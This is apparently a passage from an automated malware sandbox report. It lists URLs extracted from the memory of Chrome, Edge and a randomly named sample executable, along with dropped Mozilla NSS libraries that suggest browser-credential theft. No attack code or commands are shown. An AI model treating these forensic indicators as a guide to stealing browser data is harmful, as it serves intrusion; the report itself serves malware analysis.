Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000004.00000002.1632627585.00001B4400CA8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104explicitlyCastMediumpFloatTo16Bit
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: msedge.exe, 00000008.00000003.1557635973.00001A3C00370000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: chrome.exe, 00000004.00000002.1645471646.00005C9400238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000004.00000002.1645471646.00005C9400238000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000004.00000003.1495038547.00005C940080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000004.00000002.1648588478.00005C9400770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardhttps://labs.google.com/search/experiments
Source: chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1630406237.00001B44009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000004.00000002.1552725274.00001B4400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493492115.00001B44014D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000004.00000003.1441208457.00005C94006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000004.00000003.1440506469.00005C9400390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116Plus
Source: chrome.exe, 00000004.00000002.1648728855.00005C940078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadSidePanelCompanionDesktopM116PlusEnabled_UnPinned_NewTab_20230918
Source: chrome.exe, 00000004.00000002.1648533077.00005C9400744000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lensfrontend-pa.googleapis.com/v1/crupload2
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000004.00000002.1552725274.00001B4400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493492115.00001B44014D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000004.00000002.1552161437.00001B4400394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1553107349.00001B4400532000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1600844873.00001B4400768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: msedge.exe, 00000008.00000002.1602555111.00001A3C00314000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.cn/
Source: msedge.exe, 00000008.00000002.1602555111.00001A3C00314000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/
Source: msedge.exe, 00000008.00000002.1602555111.00001A3C00314000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://msn.com/Y
Source: chrome.exe, 00000004.00000002.1553047769.00001B44004FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635752962.00001B44010B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000004.00000002.1549279330.00001B4400078000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1624111254.00001B4400844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000004.00000002.1624111254.00001B4400844000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacyM
Source: chrome.exe, 00000004.00000003.1498924294.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635475274.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1553107349.00001B4400514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1624111254.00001B4400844000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1490760275.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000004.00000003.1498924294.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635475274.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465058102.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1490760275.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhoneaf
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/shielded-email2B
Source: chrome.exe, 00000004.00000003.1490760275.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000004.00000002.1630231675.00001B440096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1630931961.00001B4400A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: 2cc80dabc69f58b6_0.10.dr, 000003.log3.10.dr	String found in binary or memory: https://ntp.msn.com
Source: 000003.log9.10.dr, 000003.log2.10.dr	String found in binary or memory: https://ntp.msn.com/
Source: Session_13375047120913680.10.dr	String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start
Source: 2cc80dabc69f58b6_0.10.dr	String found in binary or memory: https://ntp.msn.comService-Worker-Allowed:
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000004.00000002.1550487123.00001B440020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: msedge.exe, 00000008.00000002.1602555111.00001A3C00314000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://office.net/
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000004.00000002.1634597438.00001B4400DEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyn
Source: chrome.exe, 00000004.00000002.1549222854.00001B4400060000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chrome.exe, 00000004.00000002.1636762700.00001B4401430000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/AddSession
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/Logout
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/MergeSession
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/OAuthLogin
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
Source: msedge.exe, 00000008.00000003.1557510538.00001A3C00270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
Source: chrome.exe, 00000004.00000002.1630231675.00001B440096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1630931961.00001B4400A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000003.1465464291.00001B440120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465288052.00001B44003A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1465388538.00001B44010F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
Source: chrome.exe, 00000004.00000002.1635283025.00001B4400F0C000.00000004.00000800.00020000.00000000.sdmp, chromecache_462.7.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000004.00000002.1635283025.00001B4400F0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/log?format=json&hasfast=truese)
Source: chrome.exe, 00000004.00000002.1630931961.00001B4400A1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
Source: chrome.exe, 00000004.00000002.1549279330.00001B4400078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000004.00000002.1549392273.00001B44000A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.com2
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://shieldedids-pa.googleapis.comJv
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000004.00000002.1602814232.00001B44007D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1552929037.00001B44004CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1603728519.00001B440080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632392712.00001B4400C2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: chrome.exe, 00000004.00000002.1552725274.00001B4400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493492115.00001B44014D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DbMBWMxoNv.exe, 00000000.00000003.1807489117.0000000023913000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: chrome.exe, 00000004.00000002.1630406237.00001B44009C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: DbMBWMxoNv.exe, 00000000.00000002.1925344849.0000000023310000.00000004.00000020.00020000.00000000.sdmp, DGCGDBGCAAEBFIECGHDG.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000003.1465256188.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493662612.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461286010.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1530180878.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632008118.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000003.1465256188.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493662612.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461286010.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1530180878.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632008118.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000003.1465256188.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493662612.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1461286010.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1530180878.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632008118.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635804540.00001B44010CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000004.00000003.1477050519.00001B440033C000.00000004.00000800.00020000.00000000.sdmp, chromecache_462.7.dr	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000002.1593029270.00001B4400694000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.1631970373.00001B4400B94000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.1603825782.00001B440081C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Chary
Source: chrome.exe, 00000004.00000003.1465256188.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493662612.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1530180878.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632008118.00001B4400BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000004.00000003.1465256188.00001B4400BBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2)
Source: chrome.exe, 00000004.00000003.1498924294.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635475274.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1490760275.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000004.00000003.1498924294.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1635475274.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1490760275.00001B4400FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/async/newtab_promosD
Source: content.js.10.dr, content_new.js.10.dr	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 00000004.00000003.1493824920.00001B4401514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
Source: chrome.exe, 00000004.00000002.1624165621.00001B440085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1630194465.00001B4400948000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.1624165621.00001B440085C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1550309090.00001B44001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1632427547.00001B4400C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1630194465.00001B4400948000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.1631776345.00001B4400B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1601561378.00001B4400784000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1553581939.00001B4400538000.00000004.00000800.00020000.00000000.sdmp, EHCFBFBA.0.dr, HCAEHJJK.0.dr, Web Data.10.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.1552725274.00001B4400478000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1493492115.00001B44014D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491004628.00001B4401498000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000003.1491053954.00001B44014A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=ri&ogbl
